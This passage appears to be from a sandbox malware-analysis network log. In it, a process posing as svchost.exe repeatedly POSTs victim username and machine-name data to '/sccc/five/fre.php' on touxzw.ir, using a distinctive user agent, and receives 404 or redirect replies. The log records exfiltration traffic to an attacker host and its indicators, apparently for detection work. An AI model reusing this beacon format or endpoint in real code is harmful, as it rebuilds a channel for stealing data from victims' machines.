                              Feb 20, 2025 03:44:12.216352940 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:44:13.092571974 CET842INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:44:13 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GDv3EGIZTvURG9N0DxAH9zQcE1LA5n9T3%2BuWwadW4URMXIbj0lYspm22VA0HAWn34N1t7chuFULtvulAMu10sQhdXUqac%2BupfunMQAPqqu%2FB6f8dhu4Y04773oM%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b274b9e2a4408-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1899&min_rtt=1899&rtt_var=949&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              31192.168.2.449793104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:44:14.252463102 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:44:14.257584095 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:44:15.060792923 CET840INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:44:15 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wMIRAQK5kqNqk3IjaX8sMizzQbq5c04w8Es%2FBSo1UUK3g9sT86P8jlmi9GDISR3QOqjIO9QdRkGST3WhCnugzUzEC2n7jxN05QDBeR7Bb0Gearnyu%2BPt26JsrO4%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b27579d661831-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1657&rtt_var=828&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              32192.168.2.449806104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:44:16.232182026 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:44:16.237190008 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:44:17.017465115 CET844INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:44:16 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F0byYegqHwbK35ecGBWzWJtnW8zt8Omp4NNSRkJowScg37Fe0qm9bRAVbm095t8HSBZc%2BhO8CJuaMt7DM5nt%2BzQicWkhnqTORHc3xPZO%2B8PtIZPMQiEDoEp5ECk%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b2763fd190fa5-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1656&rtt_var=828&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              33192.168.2.449819104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:44:18.175738096 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:44:18.180783033 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:44:18.948215008 CET824INHTTP/1.1 307 Temporary Redirect
                              Date: Thu, 20 Feb 2025 02:44:18 GMT
                              Connection: close
                              Via: 1.0 middlebox
                              Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rq1qsg0YCG%2B0xOdM4y9bIKZ5YptjWJn78BZ3wka2L0SfrMx%2Bg7HVzxXyLxpADoYpqTRMnxxPBkazSUM4PJ9L1VAbjc%2FASGEB7EX%2B9vvXrH%2Fszwzjqz2GJmV4EXM%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b277068f943eb-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1660&rtt_var=830&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              34192.168.2.449829104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:44:20.110713005 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:44:20.117513895 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:44:20.910202980 CET854INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:44:20 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fuUOh1ceCDbq2HS%2B5Pf%2BFfB%2FGo%2BwKFO4%2FGV0LiZn6P%2BbdIkU1oxxW3mRFTBCOkEhfAq6OUMPC04jQrsTx3RFX4oGmq4Mew%2F%2FuoAs0JftJC8%2BClGJrekfM1CeW1o%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b277c4a670f39-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1696&min_rtt=1696&rtt_var=848&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              35192.168.2.449840104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:44:22.074762106 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:44:22.080002069 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:44:22.852338076 CET837INHTTP/1.1 307 Temporary Redirect
                              Date: Thu, 20 Feb 2025 02:44:22 GMT
                              Connection: close
                              Via: 1.0 middlebox
                              Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K9aDNiQAVpXft%2BG%2FGzKcmze7U57%2FQR%2BsnaVQlA4kRMcF%2BAYKTeTe%2FA5dqzHUpmtQapr%2BW%2FZQn8%2FplZwjFpV50KtPzp%2BVWbjmjfYxNqNHtihWeWrHrmwIPGcaC%2Bs%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b27887dd372a5-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=3441&min_rtt=3441&rtt_var=1720&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              36192.168.2.449854104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:44:24.000293016 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:44:24.005440950 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:44:24.819494963 CET844INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:44:24 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ptuIUR75KS8tw8bcDb%2BFcSUMLmTh3EhuCrygmIuj0In3xq8Ip43ilIcnEpNiEzCA0okudKLOgbB8xBuIAbg%2FWpw2NA4XngcSF%2BK6yMLUMOByvTG9iZNRhY%2BABhQ%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b279479af5e72-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1687&rtt_var=843&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              37192.168.2.449868104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:44:25.980731010 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:44:25.986831903 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:44:26.634171009 CET848INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:44:26 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IDihoqYqU67S5uetcitVK4UHIb5KsagWtykkjCcLkasFca%2FaK%2F44yFbyZtajJnA38%2Bv%2FiFFLW%2FwvE81kesCkRitltWoKcK5RkJgFtAob0mO%2FX7XQT0u3nc5SSFY%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b27a0eb984385-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1808&rtt_var=904&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              38192.168.2.449881104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:44:27.780179024 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:44:27.785264015 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:44:28.528862953 CET824INHTTP/1.1 307 Temporary Redirect
                              Date: Thu, 20 Feb 2025 02:44:28 GMT
                              Connection: close
                              Via: 1.0 middlebox
                              Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zqd83%2F6r5Jqak7ynK56J3qbMdPiYH9uBwE%2BYNYQc0pebOuZF6JXX6srZO%2Fe3d0rCoNou5Zb0dVG%2FuIaeo5%2BAq4TOUT4q2mO9yRel0COEvt65agvOkydbKMlE8R4%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b27ac1cd842ad-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1740&min_rtt=1740&rtt_var=870&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              39192.168.2.449892104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:44:29.670077085 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:44:29.675257921 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:44:30.431359053 CET815INHTTP/1.1 307 Temporary Redirect
                              Date: Thu, 20 Feb 2025 02:44:30 GMT
                              Connection: close
                              Via: 1.0 middlebox
                              Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g8IcAJPJCQ88tE0oiQyMVrLcLq6wP4v8XshiGCW0zFrwNKmEiNNaDi5%2Fja3P6tHcIZ8v0STsD54Ejck5INly89CfVbST17J3Yv1qZTX5EkHyLnom5QznPjdFa7U%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b27b7e9240f43-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1608&rtt_var=804&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              40192.168.2.449908104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:44:31.760562897 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:44:31.765736103 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:44:32.663177967 CET846INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:44:32 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R7NrRZsfZ%2FhuBDCUT22ML6PVv0vgDoI4oSb3qllq17WHUiuvntXghTk1k%2B6jW1BAWoGNClUT3tnWDmxL%2FBB7tbHPPhVgKl5g1ck8arTqV3XzgZvqHJ06uh6XbqI%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b27c56afa9e17-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=30155&min_rtt=30155&rtt_var=15077&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              41192.168.2.449922104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:44:33.828871012 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:44:33.834170103 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:44:34.661083937 CET841INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:44:34 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QlVnKP8fxsZK4M7JWBoQelzMfh6m4xCl%2FWTRBp2PDTaDAE0bYJTiO33cQ57tnXt%2Fc0SLRkfDfZZJ7cjQbv1ZSY4BBnsiXDTgDlO4mg9jHKtPH6ykNlOprQC2nRc%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b27d1fb6b8c17-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=2851&min_rtt=2851&rtt_var=1425&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              42192.168.2.449934104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:44:35.816777945 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:44:35.821784973 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:44:36.566781044 CET816INHTTP/1.1 307 Temporary Redirect
                              Date: Thu, 20 Feb 2025 02:44:36 GMT
                              Connection: close
                              Via: 1.0 middlebox
                              Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iBVXC3RL1ph0WEeaQHS8QfqlvRJJs5z8FaSJPnQEvalSloGDkzVex9ZcL5WKP2pQC3SwV49QaFngYURzt02NoNHJET%2BoSRAzZPkbn1BmQuXt0v7hrdi1nuOfQVg%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b27de6c2d432c-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1751&min_rtt=1751&rtt_var=875&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              43192.168.2.449946104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:44:37.733357906 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:44:37.738492012 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
